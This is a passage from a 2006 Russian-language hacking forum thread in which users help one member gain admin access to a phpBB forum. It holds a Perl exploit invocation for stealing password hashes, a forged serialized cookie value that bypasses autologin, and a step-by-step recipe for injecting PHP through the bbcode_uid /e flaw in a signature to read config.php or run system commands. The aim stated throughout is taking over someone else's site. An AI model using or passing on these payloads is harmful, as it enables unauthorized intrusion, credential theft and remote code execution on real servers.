ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 11.06.2006, 00:19
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

Dr.Check Это phpbb Че ты в него загрузишь? ТОчнее через что? Думаешь если бы все так просто, я бы обратился.

Последний раз редактировалось DimaHbl4; 11.06.2006 в 00:21..
 

  #12  
Старый 11.06.2006, 00:32
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

в phpbb можно исполнять команды, алгоритм хеширования: md5()
хрен ли вам не хватает получить админа?
 

  #13  
Старый 11.06.2006, 00:39
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

Каким образом мне хещ достать?
 

  #14  
Старый 11.06.2006, 00:42
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Вот попробуй этот сплойт... он хеш доставает...
_ http://www.securitylab.ru/_Exploits/..._2_0_13.pl.txt
Запускать вот так....
C:\perl\bin\Perl.exe C:\perl\bin\phpbb.pl www.someserver.ru phpbb 2
Вот как раз из 2.0.12 хэш им доставали...
 

  #15  
Старый 11.06.2006, 00:45
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021

Репутация: 1879


По умолчанию

Кстати, так ты админку типо вот так захватил?
Вместо своих кукисов подставил вот это?:
Exploit:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D Если, да то я вообще не понимаю...там сразу давается нормальная рабочая админка...
 

  #16  
Старый 11.06.2006, 00:47
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

Я пробывал этот эксплойт. Пишет Exploit_Failed. Я до тучи эксплотиов пробывал все не помогают....
 

  #17  
Старый 11.06.2006, 12:55
DimaHbl4
Участник форума
Регистрация: 09.05.2006
Сообщений: 245
Провел на форуме:
565298

Репутация: 47
По умолчанию

Войдя под админом, при помощи заменой cookies идем в профиль.
Пришли? Дальше открываем исходный текст страницы и находим:
<form action="profile.php" method="post">
дописываем после profile.php такие строки ?signature_bbcode_uid=(.*)/e%00
ИТого должно получится
<form action="profile.php?signature_bbcode_uid=(.*)/e%00" method="post">

Обновляем страницу.......

И в подписе прописываем
[b:file_get_contents($_GET[bb])
В это место можно, естественно, вставить любой php-код, в том числе и system($_GET['cmd']).

Тыкаем СОхранить или ОТправить.
Идем по ссылке
http://www.someserver.ru/forum/profi...&bb=config.php

Смотри в подпись и БИНГО..... Содержимое config.php .
ДАльше делаем что хотим. (с) журнал ХАКЕР

Спасибо особенное Dr.Check'у.
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ